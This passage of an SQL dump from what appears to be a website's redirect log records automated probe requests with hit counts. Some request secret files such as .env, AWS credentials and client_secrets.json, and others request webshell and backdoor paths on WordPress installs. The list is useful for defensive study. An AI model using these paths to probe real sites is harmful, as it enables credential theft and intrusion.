02:06:36','0000-00-00 00:00:00',301),(37092,'http://3s-technologies.com.tr/tr/frontend/.env?type=rau',NULL,'http://3s-technologies.com.tr/frontend/.env?type=rau','',1,0,'2025-01-20 02:07:38','0000-00-00 00:00:00',301),(37093,'http://3s-technologies.com.tr/tr/html/.env?type=rau',NULL,'http://3s-technologies.com.tr/html/.env?type=rau','',1,0,'2025-01-20 02:08:02','0000-00-00 00:00:00',301),(37094,'http://3s-technologies.com.tr/tr/js/.env?type=rau',NULL,'http://3s-technologies.com.tr/js/.env?type=rau','',1,0,'2025-01-20 02:09:24','0000-00-00 00:00:00',301),(37095,'http://3s-technologies.com.tr/tr/localhost/.env?type=rau',NULL,'http://3s-technologies.com.tr/localhost/.env?type=rau','',1,0,'2025-01-20 02:16:13','0000-00-00 00:00:00',301),(37096,'http://3s-technologies.com.tr/tr/locally/.env?type=rau',NULL,'http://3s-technologies.com.tr/locally/.env?type=rau','',1,0,'2025-01-20 02:17:17','0000-00-00 00:00:00',301),(37097,'http://3s-technologies.com.tr/tr/mail/.env?type=rau',NULL,'http://3s-technologies.com.tr/mail/.env?type=rau','',1,0,'2025-01-20 02:18:28','0000-00-00 00:00:00',301),(37098,'http://3s-technologies.com.tr/tr/main/.env?type=rau',NULL,'http://3s-technologies.com.tr/main/.env?type=rau','',1,0,'2025-01-20 02:21:07','0000-00-00 00:00:00',301),(37099,'http://3s-technologies.com.tr/tr/myproject/.env?type=rau',NULL,'http://3s-technologies.com.tr/myproject/.env?type=rau','',1,0,'2025-01-20 02:22:24','0000-00-00 00:00:00',301),(37100,'http://3s-technologies.com.tr/tr/newsite/.env?type=rau',NULL,'http://3s-technologies.com.tr/newsite/.env?type=rau','',1,0,'2025-01-20 02:24:48','0000-00-00 00:00:00',301),(37101,'http://3s-technologies.com.tr/tr/nextjs-app/.env?type=rau',NULL,'http://3s-technologies.com.tr/nextjs-app/.env?type=rau','',1,0,'2025-01-20 02:25:46','0000-00-00 00:00:00',301),(37102,'http://3s-technologies.com.tr/tr/nginx/.env?type=rau',NULL,'http://3s-technologies.com.tr/nginx/.env?type=rau','',1,0,'2025-01-20 02:26:34','0000-00-00 00:00:00',301),(37103,'http://3s-technologies.com.tr/tr/node-api/.env?type=rau',NULL,'http://3s-technologies.com.tr/node-api/.env?type=rau','',1,0,'2025-01-20 02:27:09','0000-00-00 00:00:00',301),(37104,'http://3s-technologies.com.tr/tr/node_modules/.env?type=rau',NULL,'http://3s-technologies.com.tr/node_modules/.env?type=rau','',1,0,'2025-01-20 02:28:31','0000-00-00 00:00:00',301),(37105,'http://3s-technologies.com.tr/tr/opt/.env?type=rau',NULL,'http://3s-technologies.com.tr/opt/.env?type=rau','',1,0,'2025-01-20 02:30:55','0000-00-00 00:00:00',301),(37106,'http://3s-technologies.com.tr/tr/opt/config/.env?type=rau',NULL,'http://3s-technologies.com.tr/opt/config/.env?type=rau','',1,0,'2025-01-20 02:32:23','0000-00-00 00:00:00',301),(37107,'http://3s-technologies.com.tr/tr/opt/env/.env?type=rau',NULL,'http://3s-technologies.com.tr/opt/env/.env?type=rau','',1,0,'2025-01-20 02:32:56','0000-00-00 00:00:00',301),(37108,'http://3s-technologies.com.tr/tr/opt/src/.env?type=rau',NULL,'http://3s-technologies.com.tr/opt/src/.env?type=rau','',1,0,'2025-01-20 02:34:06','0000-00-00 00:00:00',301),(37109,'http://3s-technologies.com.tr/tr/opt/src/config/.env?type=rau',NULL,'http://3s-technologies.com.tr/opt/src/config/.env?type=rau','',1,0,'2025-01-20 02:35:53','0000-00-00 00:00:00',301),(37110,'http://3s-technologies.com.tr/tr/opt/src/env/.env?type=rau',NULL,'http://3s-technologies.com.tr/opt/src/env/.env?type=rau','',1,0,'2025-01-20 02:36:20','0000-00-00 00:00:00',301),(37111,'http://3s-technologies.com.tr/tr/platform/.env/conf/.env?type=rau',NULL,'http://3s-technologies.com.tr/platform/.env/conf/.env?type=rau','',1,0,'2025-01-20 02:38:06','0000-00-00 00:00:00',301),(37112,'http://3s-technologies.com.tr/tr/professional.lisias.net/.env?type=rau',NULL,'http://3s-technologies.com.tr/professional.lisias.net/.env?type=rau','',1,0,'2025-01-20 02:42:12','0000-00-00 00:00:00',301),(37113,'http://3s-technologies.com.tr/tr/profissional.lisias.net/.env?type=rau',NULL,'http://3s-technologies.com.tr/profissional.lisias.net/.env?type=rau','',1,0,'2025-01-20 02:43:57','0000-00-00 00:00:00',301),(37114,'http://3s-technologies.com.tr/tr/project/src/.env?type=rau',NULL,'http://3s-technologies.com.tr/project/src/.env?type=rau','',1,0,'2025-01-20 02:46:00','0000-00-00 00:00:00',301),(37115,'http://3s-technologies.com.tr/tr/react-app/.env?type=rau',NULL,'http://3s-technologies.com.tr/react-app/.env?type=rau','',1,0,'2025-01-20 02:48:06','0000-00-00 00:00:00',301),(37116,'http://3s-technologies.com.tr/tr/redmine/.env?type=rau',NULL,'http://3s-technologies.com.tr/redmine/.env?type=rau','',1,0,'2025-01-20 02:48:57','0000-00-00 00:00:00',301),(37117,'http://3s-technologies.com.tr/tr/resources/.env?type=rau',NULL,'http://3s-technologies.com.tr/resources/.env?type=rau','',1,0,'2025-01-20 02:50:15','0000-00-00 00:00:00',301),(37118,'http://3s-technologies.com.tr/tr/rest/.env?type=rau',NULL,'http://3s-technologies.com.tr/rest/.env?type=rau','',1,0,'2025-01-20 02:51:01','0000-00-00 00:00:00',301),(37119,'http://3s-technologies.com.tr/tr/scripts/.env?type=rau',NULL,'http://3s-technologies.com.tr/scripts/.env?type=rau','',1,0,'2025-01-20 02:53:04','0000-00-00 00:00:00',301),(37120,'http://3s-technologies.com.tr/tr/sendgrid/.env?type=rau',NULL,'http://3s-technologies.com.tr/sendgrid/.env?type=rau','',1,0,'2025-01-20 02:54:29','0000-00-00 00:00:00',301),(37121,'http://3s-technologies.com.tr/tr/shared/.env?type=rau',NULL,'http://3s-technologies.com.tr/shared/.env?type=rau','',1,0,'2025-01-20 02:55:34','0000-00-00 00:00:00',301),(37122,'http://3s-technologies.com.tr/tr/sites/.env?type=rau',NULL,'http://3s-technologies.com.tr/sites/.env?type=rau','',1,0,'2025-01-20 02:57:55','0000-00-00 00:00:00',301),(37123,'http://3s-technologies.com.tr/tr/sources/.env?type=rau',NULL,'http://3s-technologies.com.tr/sources/.env?type=rau','',1,0,'2025-01-20 03:00:45','0000-00-00 00:00:00',301),(37124,'http://3s-technologies.com.tr/tr/src/config/.env?type=rau',NULL,'http://3s-technologies.com.tr/src/config/.env?type=rau','',1,0,'2025-01-20 03:02:20','0000-00-00 00:00:00',301),(37125,'http://3s-technologies.com.tr/tr/stag/.env?type=rau',NULL,'http://3s-technologies.com.tr/stag/.env?type=rau','',1,0,'2025-01-20 03:03:39','0000-00-00 00:00:00',301),(37126,'http://3s-technologies.com.tr/tr/staging/.env?type=rau',NULL,'http://3s-technologies.com.tr/staging/.env?type=rau','',1,0,'2025-01-20 03:04:25','0000-00-00 00:00:00',301),(37127,'http://3s-technologies.com.tr/tr/storage/.env?type=rau',NULL,'http://3s-technologies.com.tr/storage/.env?type=rau','',1,0,'2025-01-20 03:05:19','0000-00-00 00:00:00',301),(37128,'http://3s-technologies.com.tr/tr/symlexvpn/.env-dev?type=rau',NULL,'http://3s-technologies.com.tr/symlexvpn/.env-dev?type=rau','',1,0,'2025-01-20 03:06:58','0000-00-00 00:00:00',301),(37129,'http://3s-technologies.com.tr/tr/system/.env?type=rau',NULL,'http://3s-technologies.com.tr/system/.env?type=rau','',1,0,'2025-01-20 03:08:21','0000-00-00 00:00:00',301),(37130,'http://3s-technologies.com.tr/tr/tests/.env?type=rau',NULL,'http://3s-technologies.com.tr/tests/.env?type=rau','',1,0,'2025-01-20 03:10:03','0000-00-00 00:00:00',301),(37131,'http://3s-technologies.com.tr/tr/var/.env?type=rau',NULL,'http://3s-technologies.com.tr/var/.env?type=rau','',1,0,'2025-01-20 03:10:55','0000-00-00 00:00:00',301),(37132,'http://3s-technologies.com.tr/tr/vendor/laravel/.env?type=rau',NULL,'http://3s-technologies.com.tr/vendor/laravel/.env?type=rau','',1,0,'2025-01-20 03:12:19','0000-00-00 00:00:00',301),(37133,'http://3s-technologies.com.tr/tr/website/.env?type=rau',NULL,'http://3s-technologies.com.tr/website/.env?type=rau','',1,0,'2025-01-20 03:13:10','0000-00-00 00:00:00',301),(37134,'http://3s-technologies.com.tr/tr/www-data/.env?type=rau',NULL,'http://3s-technologies.com.tr/www-data/.env?type=rau','',1,0,'2025-01-20 03:16:52','0000-00-00 00:00:00',301),(37135,'http://3s-technologies.com.tr/tr/xampp/.env?type=rau',NULL,'http://3s-technologies.com.tr/xampp/.env?type=rau','',1,0,'2025-01-20 03:18:14','0000-00-00 00:00:00',301),(37136,'http://3s-technologies.com.tr/tr/credentials/config.json?type=rau',NULL,'http://3s-technologies.com.tr/credentials/config.json?type=rau','',1,0,'2025-01-20 03:19:24','0000-00-00 00:00:00',301),(37137,'http://3s-technologies.com.tr/tr/config/default.json?type=rau',NULL,'http://3s-technologies.com.tr/config/default.json?type=rau','',1,0,'2025-01-20 03:22:17','0000-00-00 00:00:00',301),(37138,'http://3s-technologies.com.tr/tr/database-config.json?type=rau',NULL,'http://3s-technologies.com.tr/database-config.json?type=rau','',1,0,'2025-01-20 03:22:50','0000-00-00 00:00:00',301),(37139,'http://3s-technologies.com.tr/tr/ssh-config.json?type=rau',NULL,'http://3s-technologies.com.tr/ssh-config.json?type=rau','',1,0,'2025-01-20 03:23:59','0000-00-00 00:00:00',301),(37140,'http://3s-technologies.com.tr/tr/user-config.json?type=rau',NULL,'http://3s-technologies.com.tr/user-config.json?type=rau','',1,0,'2025-01-20 03:25:35','0000-00-00 00:00:00',301),(37141,'http://3s-technologies.com.tr/tr/client_secrets.json?type=rau',NULL,'http://3s-technologies.com.tr/client_secrets.json?type=rau','',1,0,'2025-01-20 03:26:02','0000-00-00 00:00:00',301),(37142,'http://3s-technologies.com.tr/tr/ws-config.json?type=rau',NULL,'http://3s-technologies.com.tr/ws-config.json?type=rau','',1,0,'2025-01-20 03:31:25','0000-00-00 00:00:00',301),(37143,'http://3s-technologies.com.tr/tr/sendgrid.json?type=rau',NULL,'http://3s-technologies.com.tr/sendgrid.json?type=rau','',1,0,'2025-01-20 03:32:14','0000-00-00 00:00:00',301),(37144,'http://3s-technologies.com.tr/tr/db.json?type=rau',NULL,'http://3s-technologies.com.tr/db.json?type=rau','',1,0,'2025-01-20 03:33:05','0000-00-00 00:00:00',301),(37145,'http://3s-technologies.com.tr/tr/smtp.json?type=rau',NULL,'http://3s-technologies.com.tr/smtp.json?type=rau','',1,0,'2025-01-20 03:34:55','0000-00-00 00:00:00',301),(37146,'http://3s-technologies.com.tr/tr/env.json?type=rau',NULL,'http://3s-technologies.com.tr/env.json?type=rau','',1,0,'2025-01-20 03:36:00','0000-00-00 00:00:00',301),(37147,'http://3s-technologies.com.tr/tr/conf.json?type=rau',NULL,'http://3s-technologies.com.tr/conf.json?type=rau','',1,0,'2025-01-20 03:36:15','0000-00-00 00:00:00',301),(37148,'http://3s-technologies.com.tr/tr/aws.json?type=rau',NULL,'http://3s-technologies.com.tr/aws.json?type=rau','',1,0,'2025-01-20 03:38:16','0000-00-00 00:00:00',301),(37149,'http://3s-technologies.com.tr/tr/awsconfig.json?type=rau',NULL,'http://3s-technologies.com.tr/awsconfig.json?type=rau','',2,0,'2025-01-20 03:38:32','0000-00-00 00:00:00',301),(37150,'http://3s-technologies.com.tr/tr/aws-secret.yaml?type=rau',NULL,'http://3s-technologies.com.tr/aws-secret.yaml?type=rau','',1,0,'2025-01-20 03:44:40','0000-00-00 00:00:00',301),(37151,'http://3s-technologies.com.tr/tr/aws/config?type=rau',NULL,'http://3s-technologies.com.tr/aws/config/?type=rau','',1,0,'2025-01-20 03:45:46','0000-00-00 00:00:00',301),(37152,'http://3s-technologies.com.tr/tr/aws/credentials?type=rau',NULL,'http://3s-technologies.com.tr/aws/credentials/?type=rau','',1,0,'2025-01-20 03:46:35','0000-00-00 00:00:00',301),(37153,'http://3s-technologies.com.tr/tr/click.php',NULL,'http://3s-technologies.com.tr/click.php','',136,0,'2025-01-21 11:57:03','0000-00-00 00:00:00',301),(37154,'http://3s-technologies.com.tr/tr/termps.php',NULL,'http://3s-technologies.com.tr/termps.php','',47,0,'2025-01-21 11:57:05','0000-00-00 00:00:00',301),(37155,'http://3s-technologies.com.tr/tr/sck.php',NULL,'http://3s-technologies.com.tr/sck.php','',12,0,'2025-01-21 11:57:06','0000-00-00 00:00:00',301),(37156,'http://3s-technologies.com.tr/tr/ans.php',NULL,'http://3s-technologies.com.tr/ans.php','',20,0,'2025-01-21 11:57:08','0000-00-00 00:00:00',301),(37157,'http://3s-technologies.com.tr/tr/buy.php',NULL,'http://3s-technologies.com.tr/buy.php','',306,0,'2025-01-21 11:57:09','0000-00-00 00:00:00',301),(37158,'http://3s-technologies.com.tr/tr/wp-content/plugins/core-econx/up.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/Core-EconX/up.php','',24,0,'2025-01-21 11:57:11','0000-00-00 00:00:00',301),(37159,'http://3s-technologies.com.tr/tr/index4.php',NULL,'http://3s-technologies.com.tr/index4.php','',5,0,'2025-01-21 11:57:12','0000-00-00 00:00:00',301),(37160,'http://3s-technologies.com.tr/tr/wp-content/termps.php',NULL,'http://3s-technologies.com.tr/wp-content/termps.php','',7,0,'2025-01-21 11:57:13','0000-00-00 00:00:00',301),(37161,'http://3s-technologies.com.tr/tr/rbh/log.ph',NULL,'http://3s-technologies.com.tr/rbh/log.ph','',8,0,'2025-01-21 11:57:15','0000-00-00 00:00:00',301),(37162,'http://3s-technologies.com.tr/tr/pwp-admin/network/login.php',NULL,'http://3s-technologies.com.tr/pwp-admin/network/login.php','',6,0,'2025-01-21 11:57:16','0000-00-00 00:00:00',301),(37163,'http://3s-technologies.com.tr/tr/wander.php',NULL,'http://3s-technologies.com.tr/wander.php','',67,0,'2025-01-21 11:57:18','0000-00-00 00:00:00',301),(37164,'http://3s-technologies.com.tr/tr/fck.php',NULL,'http://3s-technologies.com.tr/fck.php','',10,0,'2025-01-21 11:57:20','0000-00-00 00:00:00',301),(37165,'http://3s-technologies.com.tr/tr/writeable.php',NULL,'http://3s-technologies.com.tr/writeable.php','',4,0,'2025-01-21 11:57:24','0000-00-00 00:00:00',301),(37166,'http://3s-technologies.com.tr/tr/wp-content/themes/deeto/login.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/deeto/login.php','',24,0,'2025-01-21 11:57:27','0000-00-00 00:00:00',301),(37167,'http://3s-technologies.com.tr/tr/wp-includes/ixr/wp-login.php',NULL,'http://3s-technologies.com.tr/wp-includes/IXR/wp-login.php','',59,0,'2025-01-21 11:57:29','0000-00-00 00:00:00',301),(37168,'http://3s-technologies.com.tr/tr/.tmb/about.php',NULL,'http://3s-technologies.com.tr/.tmb/about.php','',7,0,'2025-01-21 11:57:32','0000-00-00 00:00:00',301),(37169,'http://3s-technologies.com.tr/tr/wp-content/themes/newsfeed-theme/bbh.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/newsfeed-theme/bbh.php','',4,0,'2025-01-21 11:57:33','0000-00-00 00:00:00',301),(37170,'http://3s-technologies.com.tr/tr/wp-content/plugins/helloapx/wp-apxupx.php?apx=upx',NULL,'http://3s-technologies.com.tr/wp-content/plugins/helloapx/wp-apxupx.php?apx=upx','',3,0,'2025-01-21 11:57:35','0000-00-00 00:00:00',301),(37171,'http://3s-technologies.com.tr/tr/css/index.php',NULL,'http://3s-technologies.com.tr/css/index.php','',175,0,'2025-01-21 11:57:53','0000-00-00 00:00:00',301),(37172,'http://3s-technologies.com.tr/tr/wp-admin/js/index.php',NULL,'http://3s-technologies.com.tr/wp-admin/js/index.php','',270,0,'2025-01-21 11:58:01','0000-00-00 00:00:00',301),(37173,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/shqwacy.php',NULL,'http://3s-technologies.com.tr/wp-admin/css/colors/sHQwacY.php','',4,0,'2025-01-21 11:58:05','0000-00-00 00:00:00',301),(37174,'http://3s-technologies.com.tr/tr/blog/index.php',NULL,'http://3s-technologies.com.tr/blog/index.php','',8,0,'2025-01-21 11:58:18','0000-00-00 00:00:00',301),(37175,'http://3s-technologies.com.tr/tr/wp-content/uploads/index.php',NULL,'http://3s-technologies.com.tr/wp-content/uploads/index.php','',215,0,'2025-01-21 11:58:26','0000-00-00 00:00:00',301),(37176,'http://3s-technologies.com.tr/tr/bk/index.php',NULL,'http://3s-technologies.com.tr/bk/index.php','',16,0,'2025-01-21 11:58:34','0000-00-00 00:00:00',301),(37177,'http://3s-technologies.com.tr/tr/wp-includes/css/index.php',NULL,'http://3s-technologies.com.tr/wp-includes/css/index.php','',140,0,'2025-01-21 11:58:40','0000-00-00 00:00:00',301),(37178,'http://3s-technologies.com.tr/tr/elp.php',NULL,'http://3s-technologies.com.tr/elp.php','',123,0,'2025-01-21 11:58:53','0000-00-00 00:00:00',301),(37179,'http://3s-technologies.com.tr/tr/wp-includes/product.php',NULL,'http://3s-technologies.com.tr/wp-includes/product.php','',14,0,'2025-01-21 11:58:59','0000-00-00 00:00:00',301),(37180,'http://3s-technologies.com.tr/tr/wp-content/languages/index.php',NULL,'http://3s-technologies.com.tr/wp-content/languages/index.php','',156,0,'2025-01-21 11:59:15','0000-00-00 00:00:00',301),(37181,'http://3s-technologies.com.tr/tr/wp-includes/js/index.php',NULL,'http://3s-technologies.com.tr/wp-includes/js/index.php','',22,0,'2025-01-21 11:59:26','0000-00-00 00:00:00',301),(37182,'http://3s-technologies.com.tr/tr/wp-includes/customize/index.php',NULL,'http://3s-technologies.com.tr/wp-includes/customize/index.php','',110,0,'2025-01-21 11:59:34','0000-00-00 00:00:00',301),(37183,'http://3s-technologies.com.tr/tr/randkeyword.php',NULL,'http://3s-technologies.com.tr/randkeyword.php','',108,0,'2025-01-21 11:59:40','0000-00-00 00:00:00',301),(37184,'http://3s-technologies.com.tr/tr/wp-includes/fonts/index.php',NULL,'http://3s-technologies.com.tr/wp-includes/fonts/index.php','',260,0,'2025-01-21 11:59:42','0000-00-00 00:00:00',301),(37185,'http://3s-technologies.com.tr/tr/plugin.php',NULL,'http://3s-technologies.com.tr/plugin.php','',102,0,'2025-01-21 11:59:43','0000-00-00 00:00:00',301),(37186,'http://3s-technologies.com.tr/tr/wp-includes/text/wp-login.php',NULL,'http://3s-technologies.com.tr/wp-includes/Text/wp-login.php','',28,0,'2025-01-21 11:59:45','0000-00-00 00:00:00',301),(37187,'http://3s-technologies.com.tr/tr/wp-includes/fonts/about.php',NULL,'http://3s-technologies.com.tr/wp-includes/fonts/about.php','',67,0,'2025-01-21 11:59:50','0000-00-00 00:00:00',301),(37188,'http://3s-technologies.com.tr/tr/wp-includes/admin.php',NULL,'http://3s-technologies.com.tr/wp-includes/admin.php','',100,0,'2025-01-21 11:59:51','0000-00-00 00:00:00',301),(37189,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue',NULL,'http://3s-technologies.com.tr/wp-admin/css/colors/blue/','',96,0,'2025-01-21 12:00:01','0000-00-00 00:00:00',301),(37190,'http://3s-technologies.com.tr/tr/x/index.php',NULL,'http://3s-technologies.com.tr/x/index.php','',39,0,'2025-01-21 12:00:04','0000-00-00 00:00:00',301),(37191,'http://3s-technologies.com.tr/tr/wp-includes/rest-api/index.php',NULL,'http://3s-technologies.com.tr/wp-includes/rest-api/index.php','',34,0,'2025-01-21 12:00:14','0000-00-00 00:00:00',301),(37192,'http://3s-technologies.com.tr/tr/wp-admin/class-db.php',NULL,'http://3s-technologies.com.tr/wp-admin/class-db.php','',24,0,'2025-01-21 12:00:18','0000-00-00 00:00:00',301),(37193,'http://3s-technologies.com.tr/tr/randkeyword.php7',NULL,'http://3s-technologies.com.tr/randkeyword.PhP7','',101,0,'2025-01-21 12:00:25','0000-00-00 00:00:00',301),(37194,'http://3s-technologies.com.tr/tr/hehehehe.php',NULL,'http://3s-technologies.com.tr/hehehehe.php','',75,0,'2025-01-21 12:00:30','0000-00-00 00:00:00',301),(37195,'http://3s-technologies.com.tr/tr/worksec.php',NULL,'http://3s-technologies.com.tr/worksec.php','',57,0,'2025-01-21 12:00:42','0000-00-00 00:00:00',301),(37196,'http://3s-technologies.com.tr/tr/ioxi002.php7',NULL,'http://3s-technologies.com.tr/ioxi002.PhP7','',43,0,'2025-01-21 12:00:43','0000-00-00 00:00:00',301),(37197,'http://3s-technologies.com.tr/tr/wp-admin/network/about.php',NULL,'http://3s-technologies.com.tr/wp-admin/network/about.php','',111,0,'2025-01-21 12:00:45','0000-00-00 00:00:00',301),(37198,'http://3s-technologies.com.tr/tr/back.php',NULL,'http://3s-technologies.com.tr/back.php','',34,0,'2025-01-21 12:00:46','0000-00-00 00:00:00',301),(37199,'http://3s-technologies.com.tr/tr/baxa1.php8',NULL,'http://3s-technologies.com.tr/baxa1.phP8','',32,0,'2025-01-21 12:00:54','0000-00-00 00:00:00',301),(37200,'http://3s-technologies.com.tr/tr/wp-includes/sitemaps/about.php',NULL,'http://3s-technologies.com.tr/wp-includes/sitemaps/about.php','',35,0,'2025-01-21 12:00:57','0000-00-00 00:00:00',301),(37201,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/about.php',NULL,'http://3s-technologies.com.tr/.well-known/acme-challenge/about.php','',133,0,'2025-01-21 12:00:58','0000-00-00 00:00:00',301),(37202,'http://3s-technologies.com.tr/tr/ova.php',NULL,'http://3s-technologies.com.tr/ova.php','',96,0,'2025-01-21 12:01:00','0000-00-00 00:00:00',301),(37203,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/about.php',NULL,'http://3s-technologies.com.tr/wp-admin/css/colors/about.php','',72,0,'2025-01-21 12:01:19','0000-00-00 00:00:00',301),(37204,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/upfile.php',NULL,'http://3s-technologies.com.tr/.well-known/acme-challenge/upfile.php','',14,0,'2025-01-21 12:01:24','0000-00-00 00:00:00',301),(37205,'http://3s-technologies.com.tr/tr/wp-admin/classwithtostring.php',NULL,'http://3s-technologies.com.tr/wp-admin/classwithtostring.php','',151,0,'2025-01-21 12:01:27','0000-00-00 00:00:00',301),(37206,'http://3s-technologies.com.tr/tr/wp-content/plugins/wordpresscore/index.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/WordPressCore/index.php','',10,0,'2025-01-21 12:01:28','0000-00-00 00:00:00',301),(37207,'http://3s-technologies.com.tr/tr/ova-tools.php',NULL,'http://3s-technologies.com.tr/ova-tools.php','',51,0,'2025-01-21 12:01:30','0000-00-00 00:00:00',301),(37208,'http://3s-technologies.com.tr/tr/version.php',NULL,'http://3s-technologies.com.tr/version.php','',27,0,'2025-01-21 12:01:31','0000-00-00 00:00:00',301),(37209,'http://3s-technologies.com.tr/tr/wp-includes/images/wp-login.php',NULL,'http://3s-technologies.com.tr/wp-includes/images/wp-login.php','',103,0,'2025-01-21 12:01:35','0000-00-00 00:00:00',301),(37210,'http://3s-technologies.com.tr/tr/wp-admin/user/index.php',NULL,'http://3s-technologies.com.tr/wp-admin/user/index.php','',172,0,'2025-01-21 12:01:38','0000-00-00 00:00:00',301),(37211,'http://3s-technologies.com.tr/tr/wp-content/themes.php',NULL,'http://3s-technologies.com.tr/wp-content/themes.php','',35,0,'2025-01-21 12:01:39','0000-00-00 00:00:00',301),(37212,'http://3s-technologies.com.tr/tr/wp-content/uploads/about.php',NULL,'http://3s-technologies.com.tr/wp-content/uploads/about.php','',76,0,'2025-01-21 12:01:41','0000-00-00 00:00:00',301),(37213,'http://3s-technologies.com.tr/tr/wp-includes/link.php',NULL,'http://3s-technologies.com.tr/wp-includes/link.php','',7,0,'2025-01-21 12:01:45','0000-00-00 00:00:00',301),(37214,'http://3s-technologies.com.tr/tr/wp-add.php',NULL,'http://3s-technologies.com.tr/wp-add.php','',9,0,'2025-01-21 12:01:52','0000-00-00 00:00:00',301),(37215,'http://3s-technologies.com.tr/tr/wp-content/plugins/ioxi/alfa-ioxi.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/ioxi/alfa-ioxi.php','',3,0,'2025-01-21 12:01:53','0000-00-00 00:00:00',301),(37216,'http://3s-technologies.com.tr/tr/wp-admin/about.php',NULL,'http://3s-technologies.com.tr/wp-admin/about.php','',176,0,'2025-01-21 12:01:55','0000-00-00 00:00:00',301),(37217,'http://3s-technologies.com.tr/tr/templates/beez/jsstrings.php',NULL,'http://3s-technologies.com.tr/templates/beez/jsstrings.php','',6,0,'2025-01-21 12:01:57','0000-00-00 00:00:00',301),(37218,'http://3s-technologies.com.tr/tr/504.php',NULL,'http://3s-technologies.com.tr/504.php','',19,0,'2025-01-21 12:02:12','0000-00-00 00:00:00',301),(37219,'http://3s-technologies.com.tr/tr/wp-admin/css/network.php',NULL,'http://3s-technologies.com.tr/wp-admin/css/network.php','',24,0,'2025-01-21 12:02:14','0000-00-00 00:00:00',301),(37220,'http://3s-technologies.com.tr/tr/wp-content/content.php',NULL,'http://3s-technologies.com.tr/wp-content/content.php','',40,0,'2025-01-21 12:02:15','0000-00-00 00:00:00',301),(37221,'http://3s-technologies.com.tr/tr/xt/index.php',NULL,'http://3s-technologies.com.tr/xt/index.php','',4,0,'2025-01-21 12:02:16','0000-00-00 00:00:00',301),(37222,'http://3s-technologies.com.tr/tr/wp-content/json.php',NULL,'http://3s-technologies.com.tr/wp-content/json.php','',51,0,'2025-01-21 12:02:20','0000-00-00 00:00:00',301),(37223,'http://3s-technologies.com.tr/tr/tiny.php',NULL,'http://3s-technologies.com.tr/tiny.php','',100,0,'2025-01-21 12:02:23','0000-00-00 00:00:00',301),(37224,'http://3s-technologies.com.tr/tr/sad/about.php',NULL,'http://3s-technologies.com.tr/sad/about.php','',21,0,'2025-01-21 12:02:28','0000-00-00 00:00:00',301),(37225,'http://3s-technologies.com.tr/tr/upgrade.php',NULL,'http://3s-technologies.com.tr/upgrade.php','',23,0,'2025-01-21 12:02:37','0000-00-00 00:00:00',301),(37226,'http://3s-technologies.com.tr/tr/wp-content/tmpls.php',NULL,'http://3s-technologies.com.tr/wp-content/tmpls.php','',7,0,'2025-01-21 12:02:39','0000-00-00 00:00:00',301),(37227,'http://3s-technologies.com.tr/tr/editor.php',NULL,'http://3s-technologies.com.tr/editor.php','',16,0,'2025-01-21 12:02:41','0000-00-00 00:00:00',301),(37228,'http://3s-technologies.com.tr/tr/vendor/bin/loader.php',NULL,'http://3s-technologies.com.tr/vendor/bin/loader.php','',7,0,'2025-01-21 12:02:44','0000-00-00 00:00:00',301),(37229,'http://3s-technologies.com.tr/tr/wp-includes/wp-includes_function.php',NULL,'http://3s-technologies.com.tr/wp-includes/wp-includes_function.php','',60,0,'2025-01-21 12:02:45','0000-00-00 00:00:00',301),(37230,'http://3s-technologies.com.tr/tr/wp-admin/css/dnizidf.php',NULL,'http://3s-technologies.com.tr/wp-admin/css/dnIzIDf.php','',3,0,'2025-01-21 12:02:47','0000-00-00 00:00:00',301),(37231,'http://3s-technologies.com.tr/tr/wp-content/themes/hideo/network.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/hideo/network.php','',52,0,'2025-01-21 12:02:48','0000-00-00 00:00:00',301),(37232,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/hsfpdcd.php',NULL,'http://3s-technologies.com.tr/wp-admin/css/colors/HsFPDcD.php','',3,0,'2025-01-21 12:02:53','0000-00-00 00:00:00',301),(37233,'http://3s-technologies.com.tr/tr/wp-admin/maint/upfile.php',NULL,'http://3s-technologies.com.tr/wp-admin/maint/upfile.php','',10,0,'2025-01-21 12:02:54','0000-00-00 00:00:00',301),(37234,'http://3s-technologies.com.tr/tr/wp-includes/room.php',NULL,'http://3s-technologies.com.tr/wp-includes/room.php','',7,0,'2025-01-21 12:02:55','0000-00-00 00:00:00',301),(37235,'http://3s-technologies.com.tr/tr/.tmb/wp-login.php',NULL,'http://3s-technologies.com.tr/.tmb/wp-login.php','',22,0,'2025-01-21 12:02:57','0000-00-00 00:00:00',301),(37236,'http://3s-technologies.com.tr/tr/3m/wp-admin/css/colors/blue',NULL,'http://3s-technologies.com.tr/3m/wp-admin/css/colors/blue/','',4,0,'2025-01-21 12:02:59','0000-00-00 00:00:00',301),(37237,'http://3s-technologies.com.tr/tr/defaul.php',NULL,'http://3s-technologies.com.tr/defaul.php','',7,0,'2025-01-21 12:03:00','0000-00-00 00:00:00',301),(37238,'http://3s-technologies.com.tr/tr/85022df0ed31.php',NULL,'http://3s-technologies.com.tr/85022df0ed31.php','',2,0,'2025-01-21 12:03:18','0000-00-00 00:00:00',301),(37239,'http://3s-technologies.com.tr/tr/nexus.php',NULL,'http://3s-technologies.com.tr/Nexus.php','',6,0,'2025-01-21 12:03:19','0000-00-00 00:00:00',301),(37240,'http://3s-technologies.com.tr/en/heh.php',NULL,'www.google.com','',4,0,'2025-01-22 00:58:28','0000-00-00 00:00:00',301),(37241,'http://3s-technologies.com.tr/tr/archive.zip',NULL,'','',13,0,'2025-01-26 01:35:48','0000-00-00 00:00:00',301),(37242,'https://3s-technologies.com.tr/en/ipfs/bafkreicyqcbhpicbos7ev4mrxofwqx6hvvge7pahpta6xuspr44crai5by',NULL,'','',1,0,'2025-01-26 06:53:30','0000-00-00 00:00:00',301),(37243,'http://3s-technologies.com.tr/tr/.txt',NULL,'','',2,0,'2025-01-26 14:34:27','0000-00-00 00:00:00',301),(37244,'http://3s-technologies.com.tr/tr/wp-json/wp/v2',NULL,'http://3s-technologies.com.tr/wp-json/wp/v2/','',1,0,'2025-01-26 14:58:23','0000-00-00 